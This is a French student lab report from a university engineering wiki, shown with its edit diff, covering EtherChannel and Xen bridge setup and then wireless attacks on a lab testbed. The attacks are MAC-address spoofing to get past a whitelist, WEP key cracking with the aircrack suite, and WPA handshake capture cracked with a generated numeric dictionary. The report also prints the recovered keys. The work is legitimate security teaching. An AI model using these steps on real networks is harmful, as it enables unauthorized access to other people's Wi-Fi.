TP sysres IMA2a5 2015/2016 G5 : Différence entre versions

De Wiki de Projets IMA
Ligne 133 : Ligne 133 :
  
 
<h3>Cassage de clé WPA </h3>
 
<h3>Cassage de clé WPA </h3>
 +
 +
Nous passons désormais au cassage de la clé WPA. Pour cela nous devons récupérer un handshake lors de la connexion d'un autre utilisateur sur la borne.
 +
On lance donc :
 +
<pre>
 +
  airodump-ng --write capture_WPA --channel 7 --BSSID 04:DA:D2:9C:50:56 mon0
 +
</pre>
 +
et on attend d'avoir capturé un handshake (ou on le provoque avec aireplay).
 +
Pendant ce temps on peut créer notre dictionnaire à l'aide d'une programme en C :
 +
<pre>
 +
  #include <stdio.h>
 +
 +
  int main(void){
 +
int i=0;
 +
while(i<100000000){
 +
printf("%08d\n",i);
 +
i++;
 +
}
 +
return 0;
 +
}
 +
</pre>
 +
 +
Une fois le handshake recupéré et le dictionnaire genéré on peut lancer le cassage de la clé avec la commande :
 +
<pre>
 +
aircrack-ng -w nom_du_fichier_dictionnaire nom_du_fichier_capture_handshake
 +
</pre>
 +
 +
Après quelques (dizaines de) minutes de patience on obtient la clé WPA de cracotte07 : 12399907

Version du 20 novembre 2015 à 10:27

Introduction

Ce TP comporte deux parties, la première est une tâche particulière pour chaque personne. La seconde est commune, elle comprend notamment (d'après le sujet disponible ici) l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés.

Ma tâche particulière consiste à configurer les liens EtherChannel entre les routeurs et les commutateurs. Ensuite j'ai dû réaliser le câblage ainsi que le bridge pour le serveur Xen.

Étape 1 : Les tâches particulières

La Configuration de l'EtherChannel

L'EtherChannel consiste à regrouper plusieurs liens physique en un unique lien logique, cela permet par exemple d'avoir un lien avec un débit de 5Gb/s à partir de 5 liens 1Gb/s. On peut placer jusqu'à 16 liens physiques dans un lien EtherChannel. Sur ces 16 liens physiques, 8 seront actifs et les 8 autres serviront de redondance en cas de problème avec un des liens actifs.

Le cahier des charges imposait de réaliser deux liens EtherChannel de 5Gb/s. N'ayant réussi à trouver que 9 GBIC (Gigabit Interface Converter) sur les 10 qui étaient nécessaires, un des liens aura un débit de 4Gb/s.

Le travail est symétrique sur les deux couples routeurs/commutateurs, je n'en décrirais donc qu'un seul.

J'ai donc connecté les ports Gigabit 0/3 à 0/7 du routeur aux ports Gigabit 5/1 à 5/5 du commutateur.

Ensuite je me suis connecté sur le routeur via le port série, on entre alors les commandes suivantes :

>enable
//passage en mode configuration
#conf term
//Selection des ports Gigabit 3 à 7
#interface range GigabitEthernet 0/3-7
//choix de l'encapsulation à utiliser
#switchport trunk encapsulation dot1q
//passage des ports en mode trunk
#switchport mode trunk
//choix du protocole utilisé
#channel-protocol lacp
//création du groupe EtherChannel
#channel-group 1 mode active
//activation des ports
#no shut
#exit
#write

sur les commandes à entrer sont à peu près les mêmes, il faut juste remplacer par les bons ports :

>enable
#conf term
#interface range GigabitEthernet 5/1-5
#switchport trunk encapsulation dot1q
#switchport mode trunk
#channel-protocol lacp
#channel-group 1 mode active
#no shut
#exit
#write

On peut ensuite vérifier que le lien est correctement configuré en entrant :

#show etherchannel

Le câblage

Voici le schéma du câblage réalisé premièrement, en attendant de recevoir d'autres fibres assez longue pour relier la baies de la salle E304 à celle de la salle E306.

Reseau.jpg

MAJ : Suite à la réception de nouvelles cartes Gigabit pour les commutateurs les Etherchannel ont désormais un débit de 8Gb.

Le bridge

Pour cette partie, le travail a été mâché par les IMA5sc. En effet les configurations pour le bridge avaient déjà été entrée dans le fichier /etc/network/interfaces du serveur Xen. J'ai seulement dû remplacer la ligne

auto bridge *****
avec ***** représentant le nom du bridge.

Par :

auto *****

J'ai ensuite ajouté les lignes :

pre-up ifconfig $IFACE up
post-down ifconfig $IFACE down

sous chaque ligne :

iface ***** inet manual
avec ***** représentant le nom de l'interface.

Les ports qui m'étaient attribué étaient les ports eth6 et eth7. Avec le câblage temporaire je n'ai besoin que d'un seul de ces ports j'ai donc relié le port 10 (qui est sur le VLAN 10) du commutateur sur le port eth6 de la machine Xen.

Je peux ensuite vérifier que l'interface eth6 est bien connectée à l'aide de la commande :

mii-tool

Étape 2 : la partie commune

Contournement du filtrage par adresse MAC

Dans cette partie nous allons essayer de contourner le filtrage par adresse MAC mis en place sur une borne Wifi. Pour cela, je vais tenter de me connecter sur borne Wifi de Marouane dont le SSID est T2. Le mot de passe est 000000000. Après la première tentative, la connexion est impossible car mon adresse MAC n'est pas dans la liste blanche de la borne. Grâce à un peu social engineering (recherche sur la page wiki de Marouane) je trouve une adresse MAC qui est autorisée à se connecter (celle d'Eric en l'occurence). J'utilise donc la commande :

    ifconfig wlan0 hw ether 00:15:af:e7:2d:fb

Mon adresse MAC est maintenant modifiée et donc autorisée sur la borne. Je peux donc accéder à internet.

Cassage de clé WEP

Nous allons désormais essayer de casser la clé WEP d'une borne du banc d'essai (ici cracotte07).

Pour cela nous allons utiliser la suite aircrack.

Tout d'abord on démarre notre carte Wifi en mode monitor.

    airmon-ng start wlan2 /* wlan2 car c'est une clé Wifi rajoutée en USB */

On repère ensuite le BSSID et le canal grâce à airodump :

   airodump-ng mon0

Pour cracotte07 il s'agit de 04:DA:D2:9C:50:56 et du canal 5.

On récupère ensuite des IVs :

   airodump-ng --write capture --channel 5 --BSSID 04:DA:D2:9C:50:56 mon0

en parallèle on lance aircrack :

   aircrack-ng -s *.cap

On a plus qu'à attendre d'avoir récupéré assez d'IVs. Après 35760 IVs :

   KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AB:BB:BB:BB ]

Cassage de clé WPA

Nous passons désormais au cassage de la clé WPA. Pour cela nous devons récupérer un handshake lors de la connexion d'un autre utilisateur sur la borne. On lance donc :

   airodump-ng --write capture_WPA --channel 7 --BSSID 04:DA:D2:9C:50:56 mon0

et on attend d'avoir capturé un handshake (ou on le provoque avec aireplay). Pendant ce temps on peut créer notre dictionnaire à l'aide d'une programme en C :

   #include <stdio.h>

   int main(void){
	int i=0;
	while(i<100000000){
		printf("%08d\n",i);
		i++;
	}
	return 0;
}

Une fois le handshake recupéré et le dictionnaire genéré on peut lancer le cassage de la clé avec la commande :

 aircrack-ng -w nom_du_fichier_dictionnaire nom_du_fichier_capture_handshake

Après quelques (dizaines de) minutes de patience on obtient la clé WPA de cracotte07 : 12399907